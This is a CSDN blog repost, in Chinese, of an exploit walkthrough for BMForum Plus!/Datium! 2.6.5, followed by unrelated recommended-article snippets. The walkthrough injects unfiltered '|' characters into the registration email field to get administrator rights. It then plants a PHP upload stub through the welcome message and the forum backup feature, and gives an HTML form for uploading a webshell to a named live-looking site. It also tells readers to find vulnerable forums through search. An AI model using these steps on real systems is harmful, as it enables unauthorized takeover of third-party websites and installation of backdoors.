BMF-提升權限之旅!

最新推荐文章于 2024-04-23 22:47:07 发布
最新推荐文章于 2024-04-23 22:47:07 发布
阅读量1k 收藏
点赞数
文章标签: input action 公告 email file php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hnxyy/article/details/320776
版权

BMF-提升權限之旅!

作者:ezboy  來源:火狐www.wrsky.com
BMF-提升權限之旅!

主要漏洞是發生在註冊會員時,部分資料沒有過濾|這個符號!!
而這個討論區會員的存檔格式為
XXX|XXXX|XXXX|
用|做為區隔的
email這個欄位剛好沒被過濾到
提交
test@test.com|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|
這樣的格式
可以比照管理員的註冊格式,發現第19格為0為管理員!!!
註冊完畢之後發現身分為管理員了!!

------------------
可以在公告裡添加木馬,然後利用論壇備份成php檔!!!
....End

利用过程:

受影响版本:

BMForum Plus! 2.6.5 贺岁版
BMForum Datium! 2.6.5 贺岁版

在baidu中搜以上版本,随便选一个,进入注册用户页面:

利用注册选项过滤不完整攻击。

mail选项填写格式:

test@test.com|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|

注册一用户eztest,密码:eztest,mail格式如上

登陆,点管理中心,用上面的用户和密码可以进入管理后台界面。

管理页面:adminindex.php

注册欢迎段信息的正文处输入;

';copy($_FILES[mf][tmp_name],$_FILES[mf][name])?>

论坛备份:

选择备份欢迎信息文件,其它都去掉

指定备份目录为:


备份路径:

face/222  other目录是必须的。

完整路径:

http://saiy.77yan.com/wrsky/face/222/other/welcome.php

phpcl.htm

<form ENCTYPE="multipart/form-data" action="http://saiy.77yan.com/wrsky/face/222/other/welcome.php" method="POST">
<input name="mf" type="file">
<input value="send" type="submit">
</form>

上传马2005.php,马的路径就是:

http://saiy.77yan.com/wrsky/face/222/other/2005.php

hnxyy
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php时间人性化展示
赛时科技
04-22 135
函数,用于将时间戳转换为人性化的时间差。该函数遍历了不同的时间单位,找到合适的单位来表示时间差,并返回相应的字符串。这样,你就可以根据需要将时间以人性化的方式展示给用户了。你可以根据具体需求调整时间格式和单位。函数将其格式化为"年-月-日 时:分:秒"的形式。然后,我们定义了一个。在上面的示例中,我们首先获取了当前的时间戳,并使用。函数来实现时间的人性化展示。函数将"-2 days"转换为时间戳),然后调用。最后,我们假设有一个过去的时间戳(这里使用。函数将其转换为人性化的时间差,并输出结果。
php中常见的文件操作方法
赛时科技
04-22 38
请注意,进行文件操作时,确保对文件路径和权限进行正确的处理,以避免出现错误或安全问题。同时,对上传的文件进行适当的验证和过滤,以防止潜在的安全风险。修改文件通常涉及到读取文件内容,进行修改,然后重新写入文件。你可以结合上述的读取和写入操作来实现文件内容的修改。PHP文件常见的操作包括读取、写入、修改、删除以及处理文件上传等操作。这只是一个基本的文件上传处理示例,实际应用中还需要考虑更多的安全性和错误处理机制。超全局数组来获取上传的文件信息。当处理文件上传时,通常使用。
bmf mysql_bmf 的动态 - SegmentFault 思否
weixin_36018419的博客
02-03 165
函数的调用过程主要要点在于借助寄存器和内存帧栈传递参数和返回值。虽然同为编译型语言,Go 相较 C 对寄存器和栈的使用有一些差别,同时,Go 语言自带协程并引入 defer 等语句,在调用过程上显得更加复杂。 理解Go函数调用在CPU指令层的过程有助于编写高效的代码,在性能优化、Bug排查的时候,能更迅速的确定要点。本文以简短的示例代码和对应的汇编代码演示了Go的调用过程,展示了不同数据类型的参数...
布尔矩阵分解 代码实现(BMF)--MEBF论文阅读
或左的博客
10-16 1909
关于布尔矩阵分解 最近在做有关布尔矩阵分解方面的研究,因为自己的方向需要,找了有关布尔矩阵分解的一干论文看了看。 关于布尔矩阵分解,实际就是对于一个布尔矩阵Am∗nA_{m*n}Am∗n​(其中元素非0即1)来分解成Bm∗kB_{m*k}Bm∗k​与Ck∗nC_{k*n}Ck∗n​,其中B与C也同样是布尔矩阵(其中元素非0即1),也就是将一个大型的布尔矩阵给分解为两个低秩矩阵的乘积。 其英文为Boolean Matrix Factorization,或者Boolean Matrix decompositio
2022年8月又更新了:房测之友(BMF2018)免数据库版BMFse,有点高大上的样子
地信网(地理信息网|测绘小站)
08-25 7250
房测之友BMFse是遵循《房产测量规范》,由广东南方数码科技股份有限公司自主研发的一套以CAD为图形平台、集外业房产测绘数据采集、房产分层分户图绘图与编辑、房屋面积分摊自动计算、质量检核到测绘成果报告书及权证附图输出等功能于一体的专业房产项目测绘系统。..................
【高效视频处理】BMF 项目安装与老视频修复体验全流程及总结
白洞,白色的明天在等着我们
01-06 1718
BMF通过提供简洁易用的跨语言接口、灵活的调度和扩展性,以 graph/pipeline 的方式构建高性能的多媒体处理链路,以模块化的方式动态扩展、管理和复用视频处理,非常适合运用在视频转码、视频抽帧、视频增强、视频分析、视频插帧、视频编辑、视频会议、VR 等领域,其具有:1、跨平台兼容性:BMF广泛支持多个操作系统,包括Linux、Windows和Mac OS,并且经过优化以适应x86和ARM CPU架构,确保在不同平台上的高效运行。2、多语言支持。
房测之友BMF2008用户手册
01-16
房测之友BMF2008用户手册
房测之友BMF2018用户手册
01-16
房测之友BMF2018用户手册
房测之友BMF2018用户手册.doc
09-27
房测之友BMF2018用户手册,房测之友BMF2018操作手册,房测之友BMF2018
bmf2---bitmap-font-for-Corona-graphics-2.0:皇冠 lua 导出 + Unicode 支持
07-13
如何使用: 在你的项目中导入 bmf2.lua + bmf_utf8.lua,然后: require('bmf2') local myfont = bmf2.loadFont('bmGlyphArial') --bmGlyphArial 是你的字体名local string = bmf2.newString(myfont, "bmGlyph and ...
TCP相关问题总结
最新发布
qq_62835094的博客
04-23 1047
假设TCP是两次握手,则可能会发生以下情况客户端发起TCP握手,向服务器发送SYN,但该数据因网络波动滞留此时触发超时重传,重新简历TCP连接当新建立的连接断开后,之前在网络中滞留的SYN连接请求传递到服务端,服务端误以为客户端需要建立TCP连接,因此会发送SYN+ACK请求,并进入连接建立状态,但客户端并不需要建立连接,不会发送数据,因此会造成服务端资源的浪费三次握手可以防止客户端无效连接信息再次到达服务器,导致重新连接之所以需要四次挥手,因为半关闭tcp通道允许双方互相发送数据,数据是双向流动的。
spdlog 日志库部分源码说明——让你可以自定义的指定自动切换日志时间
ALex_zry的博客
04-22 468
针对 网络上spdlog日志库目前存在的使用方式固定,不能发挥这个库本身应有价值的情况,这里对一些支持场景进行说明,以供初学者省去阅读源码的时间,直接上手使用。
webman 事务回滚失效问题记录
juan9872的博客
04-21 697
webman是一款基于workerman开发的高性能HTTP服务框架。webman用于替代传统的php-fpm架构,提供超高性能可扩展的HTTP服务。你可以用webman开发网站,也可以开发HTTP接口或者微服务。除此之外,webman还支持自定义进程,可以做workerman能做的任何事情,例如websocket服务、物联网、游戏、TCP服务、UDP服务、unix socket服务等等。
JetBrains PhpStorm v2024.1 安装教程 (PHP集成开发IDE)
wyqshusan的博客
04-23 526
PhpStorm是由JetBrains推出的一款轻量级集成开发环境,专为PHP开发者而设计。该软件融合了智能的HTML/CSS/JavaScript/PHP编辑器、代码质量分析工具、版本控制系统集成(包括SVN和GIT)、调试和测试等功能。除此之外,PhpStorm还提供了诸如代码自动完成、语法高亮、实时导航、实时错误检查和代码重构等实用功能。在新版本中,PhpStorm引入了许多新功能,并对现有功能进行了优化和调整。其中包括新增了死代码检测功能,可以帮助检测出冗余代码,并突出显示之前可能未被使用过的类、
WordPress自动采集发布AutoPostPro汉化版插件
pengqingwen的博客
04-23 227
WP-AutoPostPro 是一款极为出色的WordPress自动采集发布插件,其显著优势在于能够从任何网站抓取内容并自动将其发布到你的WordPress网站上。它实现了对任何网页内容的自动采集和发布,整个采集过程完全自动化,无需手动操作。此外,它还提供了一系列实用功能,如内容筛选、HTML标签过滤、关键词替换、自动添加链接、自动生成标签、自动将远程图片保存到本地服务器、自动为文章添加前缀和后缀,以及使用微软翻译引擎将采集到的文章自动翻译成多种语言进行发布。
BUUCTF中的web
2401_82388450的博客
04-22 744
1.先上传一个一句话木马的php文件,提示可以上传的文件类型。2.上传一个图片文件,抓包之后,修改文件后缀名。参数可能用于告诉服务器要加载或处理哪个文件。3.上传成功,用蚁剑连接,找到flag。注意要空一格,发现上传成功。
Nginx下PHP连接到GBase 8s数据库 - PDO_GBASEDBT方式
liaosnet的专栏
04-22 409
PHP可以通过odbc,pdo_odbc和pdo_gbasedbt三种方式连接到GBase 8s数据库,这三种方式均需要通过CSDK客户端工具。操作系统:CentOS 7.9 x86_64。
BMF报表定制工具数据库修改
07-13
请注意,在进行任何数据库修改之前,请确保您具备足够的权限和了解相关的安全性措施。同时,在进行修改之前,请务必备份数据库以防止数据丢失。 希望这些步骤能对您有所帮助!如果您还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值